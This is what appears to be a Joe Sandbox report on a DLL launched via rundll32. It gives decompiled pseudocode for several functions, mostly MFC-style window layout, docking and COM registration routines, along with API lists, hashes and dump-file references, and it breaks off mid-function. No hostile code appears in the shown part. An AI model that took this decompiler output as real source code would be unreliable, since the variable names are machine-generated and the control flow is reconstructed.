                                                                                                        • Instruction ID: 72ce7a1a3acc814aaf3fe75a7447aceb845ebfe7f652ad3d690c1253745187b6
                                                                                                        • Opcode Fuzzy Hash: b73773b73f2ef2c7aef0ed6eda5f1c8f277f0df2141217e252145798cdc9dc59
                                                                                                        • Instruction Fuzzy Hash: FD119472901725ABEB11DF54CC8869B7BE8EF09B80B014061FE04AF149D370DA00CBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E10008846(void* __ecx, intOrPtr _a4) {
                                                                                                        				struct HINSTANCE__* _t4;
                                                                                                        				_Unknown_base(*)()* _t5;
                                                                                                        				void* _t9;
                                                                                                        				void* _t10;
                                                                                                        
                                                                                                        				_t10 = __ecx;
                                                                                                        				_t4 = GetModuleHandleA("GDI32.DLL");
                                                                                                        				_t9 = 0;
                                                                                                        				_t5 = GetProcAddress(_t4, "SetLayout");
                                                                                                        				if(_t5 == 0) {
                                                                                                        					if(_a4 != 0) {
                                                                                                        						_t9 = 0xffffffff;
                                                                                                        						SetLastError(0x78);
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                                                                                        				}
                                                                                                        				return _t9;
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10038903,00000000), ref: 1000884F
                                                                                                        • GetProcAddress.KERNEL32(00000000,SetLayout,?,?,10038903,00000000), ref: 1000885D
                                                                                                        • SetLastError.KERNEL32(00000078,?,?,10038903,00000000), ref: 1000887F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                                                        • String ID: GDI32.DLL$SetLayout
                                                                                                        • API String ID: 4275029093-2147214759
                                                                                                        • Opcode ID: 26f88aebf82d2240a5b37100dab2a3fc2bb37b0a4b47fca8f0dce6e4cd8df4cf
                                                                                                        • Instruction ID: 9fbfac504fc9fab879c321f057ec9fddd0d52cf81d5381d4a1f95bb4dcd735b3
                                                                                                        • Opcode Fuzzy Hash: 26f88aebf82d2240a5b37100dab2a3fc2bb37b0a4b47fca8f0dce6e4cd8df4cf
                                                                                                        • Instruction Fuzzy Hash: EFE04F32104110EBE3919B658C4D84B7BA2EBC4AA1755CA29FAB9E20A4DF718B55CB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E10008810(signed int __ecx) {
                                                                                                        				_Unknown_base(*)()* _t3;
                                                                                                        				signed int _t7;
                                                                                                        				signed int _t8;
                                                                                                        
                                                                                                        				_t7 = __ecx;
                                                                                                        				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                                                                                        				if(_t3 == 0) {
                                                                                                        					_t8 = _t7 | 0xffffffff;
                                                                                                        					SetLastError(0x78);
                                                                                                        				} else {
                                                                                                        					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                                                                                        				}
                                                                                                        				return _t8;
                                                                                                        			}







                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,100388F6), ref: 10008818
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10008824
                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1000883C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                                                        • String ID: GDI32.DLL$GetLayout
                                                                                                        • API String ID: 4275029093-2396518106
                                                                                                        • Opcode ID: bbd44cdb57e7566bd5346f1a1961c9396e731f8aca412bb3ef847bf8d67e040a
                                                                                                        • Instruction ID: 18cb7d2df4685322d40cded84f63f3f289445b6b652452f6f9e5929145048d23
                                                                                                        • Opcode Fuzzy Hash: bbd44cdb57e7566bd5346f1a1961c9396e731f8aca412bb3ef847bf8d67e040a
                                                                                                        • Instruction Fuzzy Hash: A3D05E32A04231ABE7A06BB45D4D9467AA4EB04FF57458A34FE69F21E0CFB0CF048790
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 63%
                                                                                                        			E1002D225(intOrPtr __ecx, void* __edx) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t73;
                                                                                                        				signed char _t81;
                                                                                                        				signed int _t86;
                                                                                                        				signed int _t91;
                                                                                                        				signed int _t93;
                                                                                                        				signed int _t101;
                                                                                                        				signed int _t117;
                                                                                                        				intOrPtr _t131;
                                                                                                        				void* _t132;
                                                                                                        				intOrPtr _t139;
                                                                                                        				void* _t153;
                                                                                                        				signed int _t157;
                                                                                                        				void* _t158;
                                                                                                        				intOrPtr _t161;
                                                                                                        				void* _t162;
                                                                                                        				signed int _t164;
                                                                                                        				void* _t166;
                                                                                                        
                                                                                                        				_t153 = __edx;
                                                                                                        				_t133 = __ecx;
                                                                                                        				_t164 = _t166 - 0xb8;
                                                                                                        				_t73 =  *0x10072650; // 0xb5e27fef
                                                                                                        				 *(_t164 + 0xb4) = _t73 ^ _t164;
                                                                                                        				_t161 =  *((intOrPtr*)(_t164 + 0xc0));
                                                                                                        				_t131 = __ecx;
                                                                                                        				_t170 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t164 - 0x58)) = _t161;
                                                                                                        				 *(_t164 - 0x54) =  *(_t164 + 0xc4);
                                                                                                        				if(__ecx == 0) {
                                                                                                        					L1:
                                                                                                        					E1000836F(_t131, _t133, 0, _t161, _t170);
                                                                                                        				}
                                                                                                        				if(_t161 == 0) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				_t78 = GetWindowRect( *(_t161 + 0x20), _t164 - 0x80);
                                                                                                        				if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 ||  *(_t164 - 0x54) != 0 && EqualRect(_t164 - 0x80,  *(_t164 - 0x54)) == 0) {
                                                                                                        					if( *((intOrPtr*)(_t131 + 0x94)) != 0 && ( *(_t161 + 0x84) & 0x00000040) != 0) {
                                                                                                        						 *(_t131 + 0x80) =  *(_t131 + 0x80) | 0x00000040;
                                                                                                        					}
                                                                                                        					 *(_t131 + 0x80) =  *(_t131 + 0x80) & 0xfffffff9;
                                                                                                        					_t81 =  *(_t161 + 0x80) & 0x00000006 |  *(_t131 + 0x80);
                                                                                                        					_t178 = _t81 & 0x00000040;
                                                                                                        					 *(_t131 + 0x80) = _t81;
                                                                                                        					if((_t81 & 0x00000040) == 0) {
                                                                                                        						_push(0x104);
                                                                                                        						_push(_t164 - 0x50);
                                                                                                        						E10011872(_t131, _t161, 0, _t161, _t178);
                                                                                                        						E100296F9(_t161, _t153,  *((intOrPtr*)(_t131 + 0x20)), _t164 - 0x50);
                                                                                                        					}
                                                                                                        					_t86 = ( *(_t161 + 0x80) ^  *(_t131 + 0x80)) & 0x0000f000 ^  *(_t161 + 0x80) | 0x00000f00;
                                                                                                        					if( *((intOrPtr*)(_t131 + 0x94)) == 0) {
                                                                                                        						_t87 = _t86 & 0xfffffffe;
                                                                                                        						__eflags = _t86 & 0xfffffffe;
                                                                                                        					} else {
                                                                                                        						_t87 = _t86 | 0x00000001;
                                                                                                        					}
                                                                                                        					E1002B818(_t161, _t87);
                                                                                                        					 *((intOrPtr*)(_t164 - 0x6c)) = 0;
                                                                                                        					if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 && IsWindowVisible( *(_t161 + 0x20)) != 0) {
                                                                                                        						E100117F5(_t161, 0, 0, 0, 0, 0, 0x97);
                                                                                                        						 *((intOrPtr*)(_t164 - 0x6c)) = 1;
                                                                                                        					}
                                                                                                        					 *(_t164 - 0x70) =  *(_t164 - 0x70) | 0xffffffff;
                                                                                                        					if( *(_t164 - 0x54) == 0) {
                                                                                                        						_t60 = _t131 + 0x98; // 0x98
                                                                                                        						_t156 = _t60;
                                                                                                        						E10038EAD(_t131, _t60, _t164,  *((intOrPtr*)(_t60 + 8)), _t161);
                                                                                                        						E10038EAD(_t131, _t156, _t164,  *((intOrPtr*)(_t156 + 8)), 0);
                                                                                                        						_t91 =  *0x10099124; // 0x2
                                                                                                        						_t157 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        						_t93 =  *0x10099120; // 0x2
                                                                                                        						_t138 = _t161;
                                                                                                        						E100117F5(_t161, 0,  ~_t93,  ~_t91, 0, 0, 0x115);
                                                                                                        					} else {
                                                                                                        						CopyRect(_t164 - 0x68,  *(_t164 - 0x54));
                                                                                                        						E10008D13(_t131, _t164 - 0x68);
                                                                                                        						asm("cdq");
                                                                                                        						asm("cdq");
                                                                                                        						_push(( *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)) - _t153 >> 1) +  *((intOrPtr*)(_t164 - 0x64)));
                                                                                                        						_push(( *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68) - _t153 >> 1) +  *(_t164 - 0x68));
                                                                                                        						_push( *((intOrPtr*)(_t164 - 0x58)));
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsd");
                                                                                                        						_t117 = E1002CF10(_t131);
                                                                                                        						_t138 =  *((intOrPtr*)(_t164 - 0x58));
                                                                                                        						 *(_t164 - 0x70) = _t117;
                                                                                                        						E100117F5( *((intOrPtr*)(_t164 - 0x58)), 0,  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x64)),  *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)), 0x114);
                                                                                                        						_t161 =  *((intOrPtr*)(_t164 - 0x58));
                                                                                                        						_t157 = 0;
                                                                                                        					}
                                                                                                        					if(E1000E5E5(_t131, _t138, _t164, GetParent( *(_t161 + 0x20))) != _t131) {
                                                                                                        						E100188D4(_t161, _t131);
                                                                                                        					}
                                                                                                        					_t139 =  *((intOrPtr*)(_t161 + 0x8c));
                                                                                                        					if(_t139 != _t131) {
                                                                                                        						__eflags = _t139 - _t157;
                                                                                                        						if(_t139 != _t157) {
                                                                                                        							__eflags =  *((intOrPtr*)(_t131 + 0x94)) - _t157;
                                                                                                        							if( *((intOrPtr*)(_t131 + 0x94)) == _t157) {
                                                                                                        								L28:
                                                                                                        								_t101 = 0;
                                                                                                        								__eflags = 0;
                                                                                                        							} else {
                                                                                                        								__eflags =  *((intOrPtr*)(_t139 + 0x94)) - _t157;
                                                                                                        								if( *((intOrPtr*)(_t139 + 0x94)) != _t157) {
                                                                                                        									goto L28;
                                                                                                        								} else {
                                                                                                        									_t101 = 1;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_push(_t101);
                                                                                                        							_push(0xffffffff);
                                                                                                        							goto L30;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_push(_t157);
                                                                                                        						_push( *(_t164 - 0x70));
                                                                                                        						L30:
                                                                                                        						_push(_t161);
                                                                                                        						E1002D0EE(_t139, _t157);
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)(_t161 + 0x8c)) = _t131;
                                                                                                        					if( *((intOrPtr*)(_t164 - 0x6c)) != _t157) {
                                                                                                        						E100117F5(_t161, _t157, _t157, _t157, _t157, _t157, 0x57);
                                                                                                        					}
                                                                                                        					E1002D087(_t131, _t131, _t164, _t161);
                                                                                                        					 *(E1001357B(_t131) + 0xd0) =  *(_t78 + 0xd0) | 0x0000000c;
                                                                                                        				}
                                                                                                        				_pop(_t158);
                                                                                                        				_pop(_t162);
                                                                                                        				_pop(_t132);
                                                                                                        				return E10039F21(_t78, _t132,  *(_t164 + 0xb4) ^ _t164, _t153, _t158, _t162);
                                                                                                        			}
























                                                                                                        0x1002d452
                                                                                                        0x00000000
                                                                                                        0x1002d454
                                                                                                        0x1002d456
                                                                                                        0x1002d456
                                                                                                        0x1002d452
                                                                                                        0x1002d45b
                                                                                                        0x1002d45c
                                                                                                        0x00000000
                                                                                                        0x1002d45c
                                                                                                        0x1002d43a
                                                                                                        0x1002d43a
                                                                                                        0x1002d43b
                                                                                                        0x1002d45e
                                                                                                        0x1002d45e
                                                                                                        0x1002d45f
                                                                                                        0x1002d45f
                                                                                                        0x1002d467
                                                                                                        0x1002d46d
                                                                                                        0x1002d478
                                                                                                        0x1002d478
                                                                                                        0x1002d480
                                                                                                        0x1002d48c
                                                                                                        0x1002d48c
                                                                                                        0x1002d499
                                                                                                        0x1002d49a
                                                                                                        0x1002d49d
                                                                                                        0x1002d4aa

                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32 ref: 1002D26D
                                                                                                        • EqualRect.USER32 ref: 1002D28B
                                                                                                        • IsWindowVisible.USER32 ref: 1002D331
                                                                                                        • CopyRect.USER32 ref: 1002D363
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                          • Part of subcall function 1002CF10: GetWindowRect.USER32 ref: 1002CF74
                                                                                                          • Part of subcall function 100117F5: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,10005346), ref: 1001181B
                                                                                                        • GetParent.USER32(?), ref: 1002D418
                                                                                                          • Part of subcall function 100188D4: SetParent.USER32(?,?), ref: 100188E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: RectWindow$Parent$CopyEqualException@8H_prolog3ThrowVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 388495236-0
                                                                                                        • Opcode ID: dd1f3794c556e262e56fb27c0e2836bcfdd51c901db5f87f9c266612e01fb3af
                                                                                                        • Instruction ID: d69bbb92e6aa2c7a755fcaabceb8372724060cfe617d283d3f4571978ac7fb6d
                                                                                                        • Opcode Fuzzy Hash: dd1f3794c556e262e56fb27c0e2836bcfdd51c901db5f87f9c266612e01fb3af
                                                                                                        • Instruction Fuzzy Hash: CA71AC71A00609DBDF54EFA8DC85BAEB7B9FF44300F50452AE99AEB195DB30AD05CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E1002D4AD(intOrPtr __ecx, void* __edx) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t61;
                                                                                                        				signed char _t68;
                                                                                                        				signed int _t73;
                                                                                                        				intOrPtr _t112;
                                                                                                        				void* _t113;
                                                                                                        				signed int _t118;
                                                                                                        				signed int _t120;
                                                                                                        				void* _t137;
                                                                                                        				RECT* _t139;
                                                                                                        				void* _t141;
                                                                                                        				intOrPtr _t143;
                                                                                                        				void* _t144;
                                                                                                        				signed int _t146;
                                                                                                        				void* _t148;
                                                                                                        				void* _t149;
                                                                                                        
                                                                                                        				_t137 = __edx;
                                                                                                        				_t114 = __ecx;
                                                                                                        				_t146 = _t148 - 0xb0;
                                                                                                        				_t149 = _t148 - 0x130;
                                                                                                        				_t61 =  *0x10072650; // 0xb5e27fef
                                                                                                        				 *(_t146 + 0xac) = _t61 ^ _t146;
                                                                                                        				_t143 =  *((intOrPtr*)(_t146 + 0xb8));
                                                                                                        				_t139 =  *(_t146 + 0xbc);
                                                                                                        				_t112 = __ecx;
                                                                                                        				_t152 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t146 - 0x6c)) = _t143;
                                                                                                        				 *(_t146 - 0x70) = _t139;
                                                                                                        				if(__ecx == 0) {
                                                                                                        					L1:
                                                                                                        					E1000836F(_t112, _t114, _t139, _t143, _t152);
                                                                                                        				}
                                                                                                        				if(_t143 == 0) {
                                                                                                        					goto L1;
                                                                                                        				}
                                                                                                        				_t65 = GetWindowRect( *(_t143 + 0x20), _t146 - 0x80);
                                                                                                        				if( *((intOrPtr*)(_t143 + 0x8c)) != _t112 || _t139 != 0 && EqualRect(_t146 - 0x80, _t139) == 0) {
                                                                                                        					if( *((intOrPtr*)(_t112 + 0x94)) != 0 && ( *(_t143 + 0x84) & 0x00000040) != 0) {
                                                                                                        						 *(_t112 + 0x80) =  *(_t112 + 0x80) | 0x00000040;
                                                                                                        					}
                                                                                                        					 *(_t112 + 0x80) =  *(_t112 + 0x80) & 0xfffffff9;
                                                                                                        					_t68 =  *(_t143 + 0x80) & 0x00000006 |  *(_t112 + 0x80);
                                                                                                        					_t160 = _t68 & 0x00000040;
                                                                                                        					 *(_t112 + 0x80) = _t68;
                                                                                                        					if((_t68 & 0x00000040) == 0) {
                                                                                                        						_push(0x104);
                                                                                                        						_push(_t146 - 0x58);
                                                                                                        						E10011872(_t112, _t143, _t139, _t143, _t160);
                                                                                                        						E100296F9(_t143, _t137,  *((intOrPtr*)(_t112 + 0x20)), _t146 - 0x58);
                                                                                                        					}
                                                                                                        					_t73 = ( *(_t143 + 0x80) ^  *(_t112 + 0x80)) & 0x0000f000 ^  *(_t143 + 0x80) | 0x00000f00;
                                                                                                        					if( *((intOrPtr*)(_t112 + 0x94)) == 0) {
                                                                                                        						_t74 = _t73 & 0xfffffffe;
                                                                                                        						__eflags = _t73 & 0xfffffffe;
                                                                                                        					} else {
                                                                                                        						_t74 = _t73 | 0x00000001;
                                                                                                        					}
                                                                                                        					E1002B818(_t143, _t74);
                                                                                                        					_push(0xffffffff);
                                                                                                        					_t140 = E1002CEB4(_t112, GetDlgCtrlID( *(_t143 + 0x20)) & 0x0000ffff);
                                                                                                        					if(_t140 > 0) {
                                                                                                        						_push(_t140);
                                                                                                        						 *((intOrPtr*)(L1002CE98(_t112, _t112 + 0x98, _t140, _t143, _t146))) = _t143;
                                                                                                        					}
                                                                                                        					if( *(_t146 - 0x70) == 0) {
                                                                                                        						__eflags = _t140 - 1;
                                                                                                        						if(_t140 < 1) {
                                                                                                        							_t140 = _t112 + 0x98;
                                                                                                        							E10038EAD(_t112, _t112 + 0x98, _t146,  *((intOrPtr*)(_t112 + 0xa0)), _t143);
                                                                                                        							E10038EAD(_t112, _t140, _t146,  *((intOrPtr*)(_t140 + 8)), 0);
                                                                                                        						}
                                                                                                        						_t118 =  *0x10099124; // 0x2
                                                                                                        						_push(0x115);
                                                                                                        						__eflags = 0;
                                                                                                        						_push(0);
                                                                                                        						_push(0);
                                                                                                        						_push( ~_t118);
                                                                                                        						_t120 =  *0x10099120; // 0x2
                                                                                                        						_push( ~_t120);
                                                                                                        						_push(0);
                                                                                                        					} else {
                                                                                                        						CopyRect(_t146 - 0x68,  *(_t146 - 0x70));
                                                                                                        						E10008D13(_t112, _t146 - 0x68);
                                                                                                        						if(_t140 < 1) {
                                                                                                        							asm("cdq");
                                                                                                        							asm("cdq");
                                                                                                        							_push(( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)) - _t137 >> 1) +  *((intOrPtr*)(_t146 - 0x64)));
                                                                                                        							_push(( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68) - _t137 >> 1) +  *(_t146 - 0x68));
                                                                                                        							_t140 = _t149 - 0x10;
                                                                                                        							_push( *((intOrPtr*)(_t146 - 0x6c)));
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							E1002CF10(_t112);
                                                                                                        							_t143 =  *((intOrPtr*)(_t146 - 0x6c));
                                                                                                        						}
                                                                                                        						_push(0x114);
                                                                                                        						_push( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)));
                                                                                                        						_push( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68));
                                                                                                        						_push( *((intOrPtr*)(_t146 - 0x64)));
                                                                                                        						_push( *(_t146 - 0x68));
                                                                                                        						_push(0);
                                                                                                        					}
                                                                                                        					E100117F5(_t143);
                                                                                                        					if(E1000E5E5(_t112, _t143, _t146, GetParent( *(_t143 + 0x20))) != _t112) {
                                                                                                        						E100188D4(_t143, _t112);
                                                                                                        					}
                                                                                                        					_t123 =  *((intOrPtr*)(_t143 + 0x8c));
                                                                                                        					if( *((intOrPtr*)(_t143 + 0x8c)) != 0) {
                                                                                                        						E1002D0EE(_t123, _t140, _t143, 0xffffffff, 0);
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)(_t143 + 0x8c)) = _t112;
                                                                                                        					 *(E1001357B(_t112) + 0xd0) =  *(_t65 + 0xd0) | 0x0000000c;
                                                                                                        				}
                                                                                                        				_pop(_t141);
                                                                                                        				_pop(_t144);
                                                                                                        				_pop(_t113);
                                                                                                        				return E10039F21(_t65, _t113,  *(_t146 + 0xac) ^ _t146, _t137, _t141, _t144);
                                                                                                        			}






















                                                                                                        0x1002d678
                                                                                                        0x1002d67a
                                                                                                        0x1002d67b
                                                                                                        0x1002d67e
                                                                                                        0x1002d67f
                                                                                                        0x1002d687
                                                                                                        0x1002d688
                                                                                                        0x1002d5d8
                                                                                                        0x1002d5df
                                                                                                        0x1002d5eb
                                                                                                        0x1002d5f3
                                                                                                        0x1002d5fe
                                                                                                        0x1002d60e
                                                                                                        0x1002d616
                                                                                                        0x1002d617
                                                                                                        0x1002d61b
                                                                                                        0x1002d61d
                                                                                                        0x1002d620
                                                                                                        0x1002d621
                                                                                                        0x1002d622
                                                                                                        0x1002d625
                                                                                                        0x1002d626
                                                                                                        0x1002d62b
                                                                                                        0x1002d62b
                                                                                                        0x1002d634
                                                                                                        0x1002d639
                                                                                                        0x1002d640
                                                                                                        0x1002d641
                                                                                                        0x1002d644
                                                                                                        0x1002d647
                                                                                                        0x1002d647
                                                                                                        0x1002d68b
                                                                                                        0x1002d6a1
                                                                                                        0x1002d6a6
                                                                                                        0x1002d6a6
                                                                                                        0x1002d6ab
                                                                                                        0x1002d6b3
                                                                                                        0x1002d6ba
                                                                                                        0x1002d6ba
                                                                                                        0x1002d6c1
                                                                                                        0x1002d6cc
                                                                                                        0x1002d6cc
                                                                                                        0x1002d6d9
                                                                                                        0x1002d6da
                                                                                                        0x1002d6dd
                                                                                                        0x1002d6ea

                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32 ref: 1002D4F3
                                                                                                        • EqualRect.USER32 ref: 1002D50E
                                                                                                        • GetDlgCtrlID.USER32 ref: 1002D5AD
                                                                                                        • CopyRect.USER32 ref: 1002D5DF
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                          • Part of subcall function 1002CF10: GetWindowRect.USER32 ref: 1002CF74
                                                                                                          • Part of subcall function 100117F5: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,10005346), ref: 1001181B
                                                                                                        • GetParent.USER32(?), ref: 1002D693
                                                                                                          • Part of subcall function 100188D4: SetParent.USER32(?,?), ref: 100188E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Window$Parent$CopyCtrlEqualException@8H_prolog3Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 964284190-0
                                                                                                        • Opcode ID: 803b6f542d332ac7122ba8d999a801ca133dc651b02ba187918c95e2faca2807
                                                                                                        • Instruction ID: 5889b162fc43a884b75e0f32f304c31daaa837fe3957f50369de8d6d166ca973
                                                                                                        • Opcode Fuzzy Hash: 803b6f542d332ac7122ba8d999a801ca133dc651b02ba187918c95e2faca2807
                                                                                                        • Instruction Fuzzy Hash: D461AD71A006159FDB14EFA8DC85BAE77BAFF48300F40452AE95AEB195DB30AD05CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E1003559E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				struct HICON__* _t78;
                                                                                                        				void* _t80;
                                                                                                        				struct HICON__* _t87;
                                                                                                        				void* _t94;
                                                                                                        				void* _t99;
                                                                                                        				struct HICON__* _t108;
                                                                                                        				char* _t112;
                                                                                                        				void* _t127;
                                                                                                        				void* _t147;
                                                                                                        				int _t148;
                                                                                                        				void* _t152;
                                                                                                        
                                                                                                        				_t145 = __edx;
                                                                                                        				E1003EE82(0x100562c7, __ebx, __edi, __esi);
                                                                                                        				__imp__StringFromCLSID( *(_t152 + 0xc), _t152 - 0x14, 8);
                                                                                                        				_t147 = E1002AC64( *((intOrPtr*)(_t152 - 0x14)));
                                                                                                        				if(_t147 != 0) {
                                                                                                        					_t151 =  *((intOrPtr*)(_t152 + 8));
                                                                                                        					E100351EC(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 0, _t147);
                                                                                                        					E100351EC(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 1,  *((intOrPtr*)(_t152 + 0x10)));
                                                                                                        					__imp__CoTaskMemFree(_t147);
                                                                                                        					E10001DB0(_t152 - 0x10, E10007F7E());
                                                                                                        					 *((intOrPtr*)(_t152 - 4)) = 0;
                                                                                                        					E1002F572(0,  *((intOrPtr*)(E1000AB19(0, _t147, _t151, __eflags) + 8)), _t152 - 0x10);
                                                                                                        					E100351EC(0, _t151, _t145, _t152, __eflags, 2,  *(_t152 - 0x10));
                                                                                                        					E100351EC(0, _t151, _t145, _t152, __eflags, 3,  *((intOrPtr*)(_t152 + 0x14)));
                                                                                                        					E100351EC(0, _t151, _t145, _t152, __eflags, 4,  *((intOrPtr*)(_t152 + 0x18)));
                                                                                                        					E100351EC(0, _t151, _t145, _t152, __eflags, 5,  *((intOrPtr*)(E1000AB19(0, _t147, _t151, __eflags) + 0x10)));
                                                                                                        					E10001DB0(_t152 + 8, E10007F7E());
                                                                                                        					_t148 =  *(_t152 + 0x1c);
                                                                                                        					__eflags = _t148;
                                                                                                        					 *((char*)(_t152 - 4)) = 1;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						 *(_t152 + 0xc) =  *(_t152 - 0x10);
                                                                                                        						_t108 = ExtractIconA( *(E1000AB19(0, _t148, _t151, __eflags) + 8),  *(_t152 + 0xc), _t148);
                                                                                                        						__eflags = _t108;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							_t148 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        						} else {
                                                                                                        							DestroyIcon(_t108);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					E10006190(_t152 + 8, 0x10062f20, _t148);
                                                                                                        					_t149 =  *((intOrPtr*)(_t152 + 8));
